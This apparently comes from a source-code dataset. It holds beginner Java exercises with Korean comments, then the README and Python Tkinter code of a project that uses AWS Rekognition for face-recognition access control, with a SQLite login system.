first;\r\n\tint second;\r\n\tint result;\r\n\t// 디펄트 생성자.\r\n\t// 개발자가 생성자를 만들면 디펄트 생성자는 자동으로 만들어지지 않는다.\r\n\t// 생성자가 있는 경우 디펄트 생성자는 명시적으로 만들어 줘야 한다.\r\n\tpublic Ex07() 
{\r\n\t\tSystem.out.println(\"디펄트 생성자 실행\");\r\n\t} \r\n\tpublic Ex07(int first, int second) {\r\n\t\tthis.first = first;\r\n\t\tthis.second = second;\r\n\t}\r\n\t// setter\r\n\tpublic void setFirst(int first) {\r\n\t\tthis.first = first;\r\n\t}\r\n\tpublic void setSecond(int second) {\r\n\t\tthis.second = second;\r\n\t}\r\n\t// getter\r\n\tpublic int getFirst() {\r\n\t\treturn this.first;\r\n\t}\r\n\tpublic int getSecond() {\r\n\t\treturn this.second;\r\n\t}\r\n\tpublic int getResult() {\r\n\t\treturn this.result;\r\n\t}\r\n\tpublic void add() {\r\n\t\tthis.result = this.first + this.second;\r\n\t}\r\n\tpublic void sub() {\r\n\t\tthis.result = this.first - this.second;\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.4429175555706024, "alphanum_fraction": 0.48731499910354614, "avg_line_length": 22.842105865478516, "blob_id": "2af73807d5bff9c48ea1c31cde29125752fd84f3", "content_id": "b42c3ea9beb0767a63043b3eae1f8861aa29cc30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1014, "license_type": "no_license", "max_line_length": 47, "num_lines": 38, "path": "/20211109/src/Ex13Test.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UHC", "text": "\r\npublic class Ex13Test {\r\n\tpublic static void main(String [] args) {\r\n\t\t/*\r\n\t\t// 6단 출력\r\n\t\tfor(int i = 1 ; i <= 9; i++) {\r\n\t\t\tSystem.out.println(\"6 * \" + i + \" = \" +6*i);\r\n\t\t}\r\n\t\t// 8단 출력\r\n\t\tfor(int i = 1 ; i <= 9; i++) {\r\n\t\t\tSystem.out.println(\"8 * \" + i + \" = \" +8*i);\r\n\t\t}\r\n\t\t// 3단 출력\r\n\t\tfor(int i = 1 ; i <= 9; i++) {\r\n\t\t\tSystem.out.println(\"3 * \" + i + \" = \" +3*i);\r\n\t\t}\r\n\t\t*/\r\n\t\tgugu(3); // argument : 인자\r\n\t\tgugu(6);\r\n\t\tgugu(7);\r\n\t\tint result = 10 + 3;\r\n\t\tSystem.out.println(result);\r\n\t\tresult = 30 + 6;\r\n\t\tSystem.out.println(result);\r\n\t\tresult = add(20 , 10);\r\n\t\tSystem.out.println(result);\r\n\t\tint result1 = add(30, 
10);\r\n\t\tSystem.out.println(result1);\r\n\t} // 반복적으로 사용하는 코드가 있는 경우 함수로\r\n\t// dan : parameter : 매개변수\r\n\tpublic static void gugu(int dan) { \r\n\t\tfor(int i = 1 ; i <= 9; i++) {\r\n\t\t\tSystem.out.println(dan+\" * \"+i+\" = \"+dan*i);\r\n\t\t}\r\n\t}\r\n\tpublic static int add(int num1, int num2) {\r\n\t\treturn num1 + num2;\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.4745098054409027, "alphanum_fraction": 0.5137255191802979, "avg_line_length": 21.090909957885742, "blob_id": "4f0a9fe5309675ca81ae5e1eaedce6a377660ad8", "content_id": "fad3202c5a9ad760271972377377076fa9d1f43a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 546, "license_type": "no_license", "max_line_length": 51, "num_lines": 22, "path": "/20211104/src/Ex14.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UHC", "text": "\r\npublic class Ex14 {\r\n\r\n\tpublic static void main(String[] args) {\r\n\t\t// num = random.randint(1, 6) \r\n\t\tint num = (int)(Math.random() * 6 ) + 1; // 1 ~ 6\r\n\t\tif (num == 1) {\r\n\t\t\tSystem.out.println(\"1입니다.\");\r\n\t\t}else if(num == 2) {\r\n\t\t\tSystem.out.println(\"2입니다.\");\r\n\t\t}else if(num == 3) {\r\n\t\t\tSystem.out.println(\"3입니다.\");\r\n\t\t}else if(num == 4) {\r\n\t\t\tSystem.out.println(\"4입니다.\");\r\n\t\t}else if(num == 5) {\r\n\t\t\tSystem.out.println(\"5입니다.\");\r\n\t\t}else if(num == 6) {\r\n\t\t\tSystem.out.println(\"6입니다.\");\r\n\t\t}\r\n\t\t\r\n\t}\r\n\r\n}\r\n" }, { "alpha_fraction": 0.605042040348053, "alphanum_fraction": 0.6162465214729309, "avg_line_length": 16.6842098236084, "blob_id": "9b0d7130f18e4dbf6382fd5b4081f59f561ea9bc", "content_id": "2071c679e2b63e767dd2ad768b0fa67f4f78e737", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 363, "license_type": "no_license", "max_line_length": 36, "num_lines": 19, "path": "/20211109/src/Ex12.java", "repo_name": "minu1212/kosa202110", "src_encoding": "WINDOWS-1252", 
"text": "\r\npublic class Ex12 {\r\n\tint first;\r\n\tint second;\r\n\tpublic void setFirst(int first) {\r\n\t\tthis.first = first;\r\n\t}\r\n\tpublic void setSecond(int second) {\r\n\t\tthis.second = second;\r\n\t}\r\n\tpublic int add() {\r\n\t\treturn this.first + this.second;\r\n\t}\r\n\tpublic int sub() {\r\n\t\treturn this.first - this.second;\r\n\t}\r\n\tpublic String getName() {\r\n\t\treturn \"À̼þ¹«\";\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.5828343033790588, "alphanum_fraction": 0.6147704720497131, "avg_line_length": 19.782608032226562, "blob_id": "3eb160a3ac5355bd2f370da5fe018bb38bc97e5c", "content_id": "cc34303ef551f25c08b37697cbc571a2cb4b4915", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 509, "license_type": "no_license", "max_line_length": 42, "num_lines": 23, "path": "/20211109/src/Car2.java", "repo_name": "minu1212/kosa202110", "src_encoding": "WINDOWS-1252", "text": "\r\npublic class Car2 {\r\n\tString model;\r\n\tString color;\r\n\tint maxSpeed;\r\n\tpublic Car2(String model) {\r\n\t\tthis(model,\"Èò»ö\", 250 );\r\n\t\t/*this.model = model;\r\n\t\tthis.color = \"Èò»ö\";\r\n\t\tthis.maxSpeed = 250;*/\r\n\t}\r\n\tpublic Car2(String model,String color ) {\r\n\t\tthis(model,color, 230 );\r\n\t\t/*this.model = model;\r\n\t\tthis.color = color;\r\n\t\tthis.maxSpeed = 230;*/\r\n\t}\r\n\tpublic Car2(String model,String color ,\r\n\t\t\tint maxSpeed) {\r\n\t\tthis.model = model;\r\n\t\tthis.color = color;\r\n\t\tthis.maxSpeed = maxSpeed;\r\n\t}\r\n}" }, { "alpha_fraction": 0.3002958595752716, "alphanum_fraction": 0.357988178730011, "avg_line_length": 18.75, "blob_id": "5b09d3e106e5f44a40907d67569bb0631bba61e9", "content_id": "a502a13d72ed26480d4a425a26e0eaeb157ea0fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 708, "license_type": "no_license", "max_line_length": 45, "num_lines": 32, "path": "/20211105/src/Ex19.java", "repo_name": 
"minu1212/kosa202110", "src_encoding": "UHC", "text": "\r\npublic class Ex19 {\r\n\r\n\tpublic static void main(String[] args) {\r\n\t\t// for문 3단부터 7단까지 4곱부터 6곱까지\r\n\t\t// 1 2 4\r\n\t\tfor(int dan = 3 ; dan <= 7 ; dan ++) {\r\n\t\t\t// 3시작\r\n\t\t\t// 3-1 3-2 3-4\r\n\t\t\tfor (int gop = 4; gop <= 6; gop++) {\r\n\t\t\t\t// 3-3\r\n\t\t\t\tSystem.out.println(\r\n\t\t\t\t\t\tdan + \" * \" + gop + \" = \" + dan * gop);\r\n\t\t\t}\r\n\t\t\t// 3끝\r\n\t\t}\r\n\t\tSystem.out.println(\"=====while=====\");\r\n\t\tint dan = 3;// 1\r\n\t\twhile(dan <= 7) {//2\r\n\t\t\t//3\r\n\t\t\tint gop = 4; // 3-1\r\n\t\t\twhile (gop <= 6) { // 3-2\r\n\t\t\t\t// 3-3\r\n\t\t\t\tSystem.out.println(\r\n\t\t\t\t\t\tdan + \" * \" + gop + \" = \" + dan * gop);\r\n\t\t\t\t// 3-4\r\n\t\t\t\tgop++; \r\n\t\t\t}\r\n\t\t\tdan++;// 4\t\t\t\r\n\t\t}\r\n\t}\r\n\r\n}\r\n\r\n\r\n\r\n\r\n\r\n" } ]
17
MusieYemane/Access-Control-using-AWS-Face-Rekognition-Service-in-Python
https://github.com/MusieYemane/Access-Control-using-AWS-Face-Rekognition-Service-in-Python
741c844422dda8ba5a38dc67d1a56400c4a232ed
fe196d5541521f1154042b4df6d0c716dde3b46f
47c2aac3ae3f92df607f8d912e6918701ff9d4f6
refs/heads/master
2023-01-03T21:55:55.269103
2020-10-31T11:59:12
2020-10-31T11:59:12
308,823,451
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.8026700019836426, "alphanum_fraction": 0.8035044074058533, "avg_line_length": 118.80000305175781, "blob_id": "5374079d283816393da8beb51b01455269c78601", "content_id": "db09c05b594367c47e3e5fb7ab1bd46c0c3eed83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2397, "license_type": "no_license", "max_line_length": 1232, "num_lines": 20, "path": "/README.md", "repo_name": "MusieYemane/Access-Control-using-AWS-Face-Rekognition-Service-in-Python", "src_encoding": "UTF-8", "text": "# Access-Control-using-AWS-Face-Rekognition-Service-in-Python\nIn this project, we propose the use of facial recognition in access control system. Nowadays, facial recognition is applied in many fields from logging in to user account through built in camera of smartphones to identification of suspected people by the law enforcements. A manager of a company that uses this system have access to an application, which is designed to let the manger add staff of the company as well as any suspected criminal along with their photo. The application let the manager assign the staffs as employees, but suspected people are assigned as blacklists. The information is stored in amazon web service. On the other hand, a camera is implemented at a required entrance to stream real time video and detect face. If face is detected, the camera sends face recognition request to amazon web service where the manager previously added people. Finally, the system will be able to recognize the detected face as either employee, blacklist or unknown. The entrance opens if the face is recognized as an employee, whereas if the face is unknown the entrance remains closed and a speaker asks the user to visit the security for more information. 
If the face is detected as a blacklist, the system alerts an alarm.\n\n\n\nHow this project works:\n\nFirst, create Amazon Web Service Account so that you have can access Amazon face rekognition service, which is extensively applied in this project. \nIn your aws account, go to user and add new policies, Rekognition full access and IAM user.\n\nThen, open admin_monitor.py in your favourite python editor and find variables access_key_id and secret_access_key. Replace the value of the r actual aws key and secret id, which you can get from your aws account. Do the same to the face_recognition_system.py.\n\nFinally, run admin_monitor.py using python3 and you will see a sign up page. Sign up and then log in. \n\nAfter logging in, you have an admin access to the system. You can add people and their face image and label them as employee or blacklists.\n\nThen run face_recognition_system.py using python3. This will open a window which takes a real time video using your computer's camera. If a face is detected, then it compares it against the people you previously added and outputs either employee or blacklist if they are recognized, else it outputs unknown person.\n\n\nEnjoy! 
\n" }, { "alpha_fraction": 0.509757936000824, "alphanum_fraction": 0.5246694684028625, "avg_line_length": 36.725894927978516, "blob_id": "693018029309b9388ffa29fc91a7628ba80cba50", "content_id": "411e65258c4221b059998f540536ffd6d5f8b174", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 47346, "license_type": "no_license", "max_line_length": 164, "num_lines": 1255, "path": "/admin_monitor.py", "repo_name": "MusieYemane/Access-Control-using-AWS-Face-Rekognition-Service-in-Python", "src_encoding": "UTF-8", "text": "import csv\nimport tkinter as tk\nfrom tkinter import *\nimport os\nimport logging\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nfrom PIL import ImageTk, Image\nimport boto3\nfrom botocore.exceptions import ClientError\nimport _sqlite3\n\n### Before running this code, create an amazone account user and get the aws secret key and access key id.\n###And also go to aws users--> add permissions--> add AmazoneS3Fullaccess and AmazonRekognitionFullAccess and IAMUserChanegePassword permissions\n\naccess_key_id = '**************' ##Enter your AWS access key id here for ex. 
'AKIL4GOQL&QREDSFFUTQT'\nsecret_access_key = '*****************' ##Enter your AWS Secret access key here ex.'QS5W/xw5zdM6bcZwbz2ZYyLLQlmqdEibQIyn4L87'\n\n# create a database or connect to one\n\nconn = _sqlite3.connect('Register.db')\n\n# create a cursor\n\nc = conn.cursor()\n\n\n# # create a table\n#\n# c.execute(\"\"\" CREATE TABLE address(\n# firs_name text,\n# last_name text,\n# username text,\n# password text\n#\n# )\"\"\")\n\n\n################################################################################################\n# create subbimit functio to define submit\n\nf = open(\"tempUser\", \"r\")\nuname = f.readline()\nf.close()\n\nclass App(Tk):\n def __init__(self, *args, **kwargs):\n Tk.__init__(self, *args, **kwargs)\n # Setup Menu\n MainMenu(self)\n self.winfo_toplevel().title(\"Face Recognition Access Control\")\n # Setup Frame\n container = Frame(self)\n container.pack(side=\"top\", fill=\"both\", expand=True)\n container.grid_rowconfigure(0, weight=1)\n container.grid_columnconfigure(0, weight=1)\n\n self.frames = {}\n\n for F in (StartPage, loginPage, signupPage, deleteAccountPage, PageTwo):\n frame = F(container, self)\n self.frames[F] = frame\n frame.grid(row=0, column=0, sticky=\"nsew\")\n\n\n if not uname:\n self.show_frame(StartPage)\n else:\n self.show_frame(PageTwo)\n\n\n def show_frame(self, context):\n frame = self.frames[context]\n frame.tkraise()\n\n def get_page(self, page_class):\n return self.frames[page_class]\n\n\nclass StartPage(Frame):\n def __init__(self, parent, controller):\n\n Frame.__init__(self, parent)\n self.controller = controller\n\n Frame.config(self,bg='lightgreen')\n\n label = Label(self, text=\" Start Page \",\n font=(\"Arial Black\", 20, 'bold'), bg= 'darkred', fg='lightyellow')\n label.grid(row=0, )\n\n btnLogin = Button(self, text=\"Log In\", width=50,\n command=lambda: controller.show_frame(loginPage))\n btnLogin.grid(row=1, column=0, ipady=20, pady=20, padx=120)\n btnSignup = Button(self, text=\"Sign Up\", 
width=50,\n command=lambda: controller.show_frame(signupPage))\n btnSignup.grid(row=2, column=0, ipady=20, pady=20, padx=120)\n\n deleteAccount = Button(self, text=\"Delete Account\", width=50,\n command=lambda: controller.show_frame(deleteAccountPage))\n deleteAccount.grid(row=3, column=0, ipady=20, pady=20, padx=120)\n\n\n\nclass loginPage(Frame):\n def __init__(self, parent, controller):\n Frame.__init__(self, parent)\n self.controller = controller\n Frame.config(self, bg='lightgreen')\n\n label = Label(self, text=\" Login Page \",\n font=(\"Arial Black\", 20, 'bold'), bg= 'darkred', fg='lightyellow')\n label.grid(row=0, column=0, columnspan=2)\n label.config(font=(\"Times\", 40, 'bold'), fg='white', bg='darkred')\n\n username_label = Label(self, text=\"Username:\",font=(\"Times\", 20), bg='lightgreen')\n username_label.grid(row=2, column=0, pady=20)\n\n password_label = Label(self, text=\"Password:\", font=(\"Times\", 20), bg='lightgreen')\n password_label.grid(row=3, column=0, pady=20)\n\n self.username = Entry(self, width=30)\n self.username.grid(row=2, column=1, padx=0, pady=20)\n\n self.password = Entry(self, width=30, show=\"*\")\n self.password.grid(row=3, column=1, padx=0, pady=20)\n\n login_btn = Button(self, text=\"Login\", command=self.login)\n login_btn.grid(row=4, column=0, columnspan=2,\n pady=20, padx=10, ipadx=100, ipady=10)\n\n login_btn = Button(self, text=\"Back\",\n command=lambda: controller.show_frame(StartPage))\n login_btn.grid(row=5, column=0, columnspan=2,\n pady=20, padx=10, ipadx=100, ipady=10)\n\n def login(self):\n conn = _sqlite3.connect('Register.db')\n\n # create a cursor\n\n c = conn.cursor()\n print_results = ''\n if self.username.get == \"\" or self.password.get() == \"\":\n messagebox.showerror('Incomplete Entry','Please complete the required field!')\n # print_results = \"Please complete the required field!\"\n else:\n c.execute(\"select * FROM `address` WHERE `username` = ? 
and `password` = ?\",\n (self.username.get(), self.password.get()))\n\n if c.fetchone() is not None:\n # print_results = \"You Successfully login\"\n #set username to the log in username to identify his collection and folder photo\n\n # write the input to tempUser to remember him as temporary user\n f = open(\"tempUser\", \"w\")\n f.write(self.username.get())\n\n f = open(\"tempUser\", \"r\")\n uname=f.readline()\n # update the uname in PageTwo\n self.controller.get_page(PageTwo).setUserName()\n\n self.controller.get_page(PageTwo).list_faces_in_collection()\n self.controller.show_frame(PageTwo)\n f.close()\n\n else:\n messagebox.showerror('Invalid Entry', 'Invalid Username or password')\n # print_results = text = \"Invalid Username or password\"\n self.username.delete(0, END)\n self.password.delete(0, END)\n\n # create label results\n lbl_result1 = Label(self, text=print_results)\n lbl_result1.grid(row=11, column=0, columnspan=2)\n\n # commit changes\n conn.commit()\n\n # close connection\n conn.close()\n\n # create a delete registry function\n\n\nclass signupPage(Frame):\n def __init__(self, parent, controller):\n Frame.__init__(self, parent)\n self.controller = controller\n Frame.config(self, bg='lightgreen')\n\n label = Label(self, text=\" Signup Page \",\n font=(\"Arial Black\", 20, 'bold'), bg='darkred', fg='lightyellow')\n label.grid(row=0, column=0, columnspan=2)\n label.config(font=(\"Times\", 40, 'bold'), fg='white', bg='darkred')\n\n\n self.f_name = Entry(self, width=30)\n self.f_name.grid(row=1, column=1, padx=20)\n\n self.l_name = Entry(self, width=30)\n self.l_name.grid(row=2, column=1, padx=20)\n\n self.username = Entry(self, width=30)\n self.username.grid(row=3, column=1, padx=20)\n\n self.password = Entry(self, width=30, show=\"*\")\n self.password.grid(row=4, column=1, padx=20)\n\n self.email = Entry(self, width=30)\n self.email.grid(row=5, column=1, padx=20)\n 
#########################################################################################################\n # create Text Boxes Labels\n f_name_label = Label(self, text=\"First Name\", font=(\"Times New Roman\", 16), bg='lightgreen')\n f_name_label.grid(row=1, column=0, pady=20, )\n\n l_name_label = Label(self, text=\"Last Name\", font=(\"Times New Roman\", 16),bg='lightgreen')\n l_name_label.grid(row=2, column=0, pady=20)\n\n username_label = Label(self, text=\"Username\", font=(\"Times New Roman\", 16),bg='lightgreen')\n username_label.grid(row=3, column=0, pady=20)\n\n password_label = Label(self, text=\"Password\", font=(\"Times New Roman\", 16),bg='lightgreen')\n password_label.grid(row=4, column=0, pady=20)\n\n lblEmail = Label(self, text=\"Email\", font=(\"Times New Roman\", 16), bg='lightgreen')\n lblEmail.grid(row=5, column=0, pady=20)\n\n ########################################################################################################\n # create a submit buttons\n submit_btn = Button(self, text=\"Register\", command=self.submit)\n submit_btn.grid(row=6, column=0, columnspan=2,\n pady=10, padx=10, ipadx=100, ipady=20)\n\n login_btn = Button(self, text=\"Back\",\n command=lambda: controller.show_frame(StartPage))\n login_btn.grid(row=7, column=0, columnspan=2,\n pady=10, padx=10, ipadx=100, ipady=20)\n\n # # create a query button\n # qury_btn = Button(self, text=\"Show Records\", command=self.query)\n # qury_btn.grid(row=9, column=0, columnspan=2, pady=10, padx=10, ipadx=137)\n #\n # # create a delete button\n # delet_btn = Button(self, text=\"Delete A Record\", command=self.delete)\n # delet_btn.grid(row=8, column=0, columnspan=2)\n\n # navigate to pages\n # page_one = Button(self, text=\"Page One\", command=lambda: controller.show_frame(PageOne))\n # page_one.grid()\n # page_two = Button(self, text=\"Page Two\", command=lambda: controller.show_frame(PageTwo))\n # page_two.grid()\n # This adds a folder to bucket/DB to store photos for each signing 
up users\n\n\n # # Create a folder in the aws database/ bucket named mosibucket1\n # def createFolderInBucket(self, username):\n # s3 = boto3.client('s3',\n # aws_access_key_id=access_key_id,\n # aws_secret_access_key=secret_access_key,\n # region_name='us-east-2'\n # )\n # bucket_name = \"mosibucket1\"\n # directory_name = username # it's name of your folders\n # s3.put_object(Bucket=bucket_name, Key=(directory_name + '/'))\n #\n #create a storage of pjotos called s3 bucket at s3 database\n\n # def deleteFolderInBucket(self, username):\n # s3 = boto3.resource('s3',\n # aws_access_key_id=access_key_id,\n # aws_secret_access_key=secret_access_key,\n # region_name='us-east-2'\n # )\n # bucket = s3.Bucket('mosibucket1')\n # bucket.objects.filter(Prefix=username + '/').delete()\n\n def createBucket(self, username):\n s3 = boto3.client('s3',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2'\n )\n #better to put try and error as bucket names are unique in the region and others could already took ur name\n response = s3.create_bucket(\n Bucket='mosiusersbucket-' + username,\n CreateBucketConfiguration={\n 'LocationConstraint': 'us-east-2',\n },\n )\n\n def createFaceCollection(self, username):\n client = boto3.client('rekognition',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2'\n )\n response = client.create_collection(\n CollectionId=username\n )\n\n\n\n\n def submit(self):\n conn = _sqlite3.connect('Register.db')\n\n # create a cursor\n\n c = conn.cursor()\n result2 = \"\"\n\n if self.f_name.get == \"\" or self.l_name.get() == \"\" or self.username.get() == \"\" or self.password.get == \"\":\n result2 = \"Please complete the required field!\"\n else:\n c.execute(\"SELECT * FROM `address` WHERE `username` = ?\",\n (self.username.get(),))\n if c.fetchone() is not None:\n result2 = \"Username is already taken\"\n else:\n c.execute(\"INSERT INTO address 
VALUES(:f_name, :l_name, :username, :password)\",\n\n {\n 'f_name': self.f_name.get(),\n 'l_name': self.l_name.get(),\n 'username': self.username.get(),\n 'password': self.password.get()\n\n }\n )\n\n # Create a folder in the aws database/ bucket named mosibucket1\n self.createBucket(self.username.get())\n # create a collection to store faces\n self.createFaceCollection(self.username.get())\n\n\n # create a confirmation label\n\n lbl_result = Label(self, text=result2)\n lbl_result.grid(row=11, column=0, columnspan=2)\n\n ###################################################################################################################################\n\n # Insert Into a Table\n\n # commit changes\n conn.commit()\n\n # close connection\n conn.close()\n\n # clear text boxes\n self.f_name.delete(0, END)\n self.l_name.delete(0, END)\n self.username.delete(0, END)\n self.password.delete(0, END)\n\n\n # create a query function\n def query(self):\n conn = _sqlite3.connect('Register.db')\n\n # create a cursor\n\n c = conn.cursor()\n\n # Query the database\n c.execute(\"SELECT *, oid FROM address\")\n records = c.fetchall()\n # print(records)\n\n # Loop through results\n print_records = ''\n for record in records:\n print_records += str(record[0]) + \" \" + str(record[1]) + \\\n \" \" + str(record[2]) + \" \" + str(record[3]) + \"\\n\"\n\n # creat a label records\n\n query_label = Label(self, text=print_records)\n query_label.grid(row=10, column=0, columnspan=2)\n\n # commit changes\n conn.commit()\n\n # close connection\n conn.close()\n\n\n\nclass deleteAccountPage(Frame):\n def __init__(self, parent, controller):\n Frame.__init__(self, parent)\n self.controller = controller\n Frame.config(self, bg='lightgreen')\n\n label = Label(self, text=\" Delete Account Page \",\n font=(\"Arial Black\", 20, 'bold'), bg='darkred', fg='lightyellow')\n label.grid(row=0, column=0, columnspan=2)\n label.config(font=(\"Times\", 40, 'bold'), fg='white', bg='darkred')\n\n self.username = 
Entry(self, width=30)\n self.username.grid(row=2, column=1, padx=20)\n\n self.password = Entry(self, width=30, show=\"*\")\n self.password.grid(row=3, column=1, padx=20)\n\n username_label = Label(self, text=\"Username:\", font=(\"Times\", 18), bg='lightgreen')\n username_label.grid(row=2, column=0, pady=30)\n\n password_label = Label(self, text=\"Password:\", font=(\"Times\", 18), bg='lightgreen')\n password_label.grid(row=3, column=0,pady=30)\n\n # create a delete button\n delet_btn = Button(self, text=\"Delete Account\", command=self.delete)\n delet_btn.grid(row=4, column=0, columnspan=2,\n pady=20, ipadx=40, ipady=10)\n\n delet_btn = Button(self, text=\"Back\",\n command=lambda: controller.show_frame(StartPage))\n delet_btn.grid(row=5, column=0, columnspan=2,\n pady=20, ipadx=40, ipady=10)\n\n # create a query button\n qury_btn = Button(self, text=\"Show Records\", command=self.query)\n qury_btn.grid(row=6, column=0, columnspan=2,\n pady=10, padx=10, ipadx=137)\n\n # create a delete registry function\n def deleteBucket(self, username):\n s = boto3.resource('s3',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2'\n )\n bucket = s.Bucket('mosiusersbucket-'+username)\n bucket.object_versions.delete()\n\n s3 = boto3.client('s3',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2'\n )\n response = s3.delete_bucket(\n Bucket='mosiusersbucket-'+username\n )\n\n def deleteFaceCollection(self, username):\n client = boto3.client('rekognition',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2'\n )\n response = client.delete_collection(\n CollectionId=username\n )\n\n\n def delete(self):\n # create a database or connect to one\n\n conn = _sqlite3.connect('Register.db')\n\n # create a cursor\n\n c = conn.cursor()\n\n # Delete a record\n print_results2 = ''\n if self.username.get == \"\" or self.password.get() == 
\"\":\n print_results2 = \"Please complete the required field!\"\n else:\n c.execute(\"DELETE from address WHERE `username` = ? and `password` = ?\",\n (self.username.get(), self.password.get()))\n # if c.fetchone() is None:\n # print_results2 = \"You Successfully deleted\"\n # else:\n # print_results2 = text = \"Invalid Username or password\"\n\n # delete the bucket folder and collection in aws database\n self.deleteFaceCollection(self.username.get())\n self.deleteBucket(self.username.get())\n\n self.username.delete(0, END)\n self.password.delete(0, END)\n\n # create label results\n lbl_result2 = Label(self, text=print_results2)\n lbl_result2.grid(row=12, column=0, columnspan=2)\n\n # commit changes\n conn.commit()\n\n # close connection\n conn.close()\n\n\n\n def query(self):\n conn = _sqlite3.connect('Register.db')\n\n # create a cursor\n\n c = conn.cursor()\n\n # Query the database\n c.execute(\"SELECT *, oid FROM address\")\n records = c.fetchall()\n # print(records)\n\n # Loop through results\n print_records = ''\n for record in records:\n print_records += str(record[0]) + \" \" + str(record[1]) + \\\n \" \" + str(record[2]) + \" \" + str(record[3]) + \"\\n\"\n\n # creat a label records\n\n query_label = Label(self, text=print_records)\n query_label.grid(row=10, column=0, columnspan=2)\n\n # commit changes\n conn.commit()\n\n # close connection\n conn.close()\n\n\nclass PageTwo(Frame):\n def __init__(self, parent, controller):\n Frame.__init__(self, parent)\n self.controller = controller\n Frame.config(self,bg='lightgreen')\n\n titleFrame = Frame(self) # create empty box\n # Thin inserts topFrame to the root app\n titleFrame.pack()\n titleFrame.config(bg='lightgreen')\n\n topFrame = Frame(self) # create empty box\n topFrame.pack() # Thin inserts topFrame to the root app\n topFrame.config(bg='lightgreen')\n\n bottomFrame = Frame(self)\n bottomFrame.pack()\n bottomFrame.config(bg='lightgreen')\n\n frame3 = Frame(self)\n frame3.pack()\n 
frame3.config(bg='lightgreen')\n #\n # frame4 = Frame(self)\n # frame4.grid(row=4, pady=10)\n # # frame4.config(bg='lightgreen')\n #\n # frame5 = Frame(self)\n # frame5.grid(row=5, pady=10)\n # frame5.config(bg='lightblue')\n #\n # frame6 = Frame(self)\n # frame6.grid(row=6, pady=10)\n # # frame6.config(bg='lightgreen')\n\n l = Label(titleFrame, text=\" Admin Monitor \")\n l.grid(row=0)\n l.config(font=(\"Arial Black\", 20, 'bold'),\n bg='darkred', fg='lightyellow', justify=CENTER)\n\n self.currentUser = Label(titleFrame, text='')\n self.currentUser.grid(row=1)\n self.currentUser.config(font=(\"Times\", 14,'bold'),\n fg='green', justify=CENTER, bg='lightgreen')\n\n l1 = Label(topFrame, text=\"First Name: \")\n l1.grid(row=1, padx=0)\n l1.config(font=(\"Times\", 20), fg='black',bg='lightgreen')\n l2 = tk.Label(topFrame, text=\"Last Name: \")\n l2.grid(row=2)\n l2.config(font=(\"Times\", 20), fg='black',bg='lightgreen')\n l3 = tk.Label(topFrame, text=\"Permission: \")\n l3.grid(row=3)\n l3.config(font=(\"Times\", 20), fg='black',bg='lightgreen')\n\n # make entries/ input\n self.e1 = Entry(topFrame, width=40)\n self.e1.grid(row=1, column=1, pady=10)\n self.e1.config(validate='key' ,validatecommand=(\n self.register(self.validateStr), '%P'))\n\n self.e2 = Entry(topFrame, width=40)\n self.e2.grid(row=2, column=1, pady=20)\n self.e2.config(validate='key', validatecommand=(\n self.register(self.validateStr), '%P'))\n\n self.options = tk.StringVar()\n self.e3 = tk.OptionMenu(topFrame, self.options,\n 'Employee', 'Blacklist')\n self.e3.grid(row=3, column=1, pady=10)\n self.e3.config(pady=10, padx=90, width=8, bg='lightgreen')\n self.options.set('---')\n\n # self.mb = Menubutton(topFrame, text=\"Add People\")\n # self.mb.menu = Menu(self.mb)\n # self.mb[\"menu\"] = self.mb.menu\n # self.mb.menu.add_command(\n # label=\"Browse from computer\", command=self.uploadFile)\n # self.mb.menu.add_command(\n # label=\"Take photo from Camera\", command=lambda: print(\"Opening 
camera...\"))\n #\n # self.mb.grid(row=4, column=1, pady=20)\n # self.mb.config(pady=15, padx=30, width=15,font=(\"Calibri\", 15, 'bold'))\n\n # delete employees button\n btnAdd = Button(topFrame,\n text=\"Add Person\",\n fg=\"black\",\n width=15,\n command=self.uploadFile,\n )\n\n btnAdd.grid(row=4, column=1, pady=20)\n btnAdd.config(pady=15, padx=30, width=15,font=(\"Calibri\", 15, 'bold'))\n\n # delete employees button\n btnDelete = Button(frame3,\n text=\"Delete\",\n fg=\"black\",\n width=15,\n command=self.deletePhoto,\n )\n\n btnDelete.grid(row=2,column=1, sticky=tk.W, pady=4, padx=8)\n btnDelete.config(pady=10)\n\n # show employees photo button\n btnShowEmpPhoto = Button(frame3,\n text=\"Photo\",\n fg=\"black\",\n width=15,\n command=self.showEmpImage,\n )\n\n btnShowEmpPhoto.grid(row=2, column=0, sticky=tk.W, pady=4, padx=40)\n btnShowEmpPhoto.config(pady=10)\n\n # delet blacklist button\n btnDelete2 = Button(frame3,\n text=\"Delete\",\n fg=\"black\",\n width=15,\n command=self.deleteBlacklist,\n )\n\n btnDelete2.grid(row=2, column=4, sticky=tk.W, pady=4, padx=8)\n btnDelete2.config(pady=10)\n\n # show blacklist photo button\n btnShowBlackPhoto = Button(frame3,\n text=\"Photo\",\n fg=\"black\",\n width=15,\n command=self.showBlackPhoto,\n )\n\n btnShowBlackPhoto.grid(row=2, column=3, sticky=tk.W, pady=4, padx=40)\n btnShowBlackPhoto.config(pady=10)\n\n # List of people authorized\n self.showList = Label(frame3, text=\" Id List of Employees \")\n self.showList.grid(row=0,columnspan=2, sticky=\"W\")\n self.showList.config(font=(\"Calibri\", 20, 'bold'),fg='white', bg='black')\n\n\n self.lboxEmpl = tk.Listbox(\n frame3, 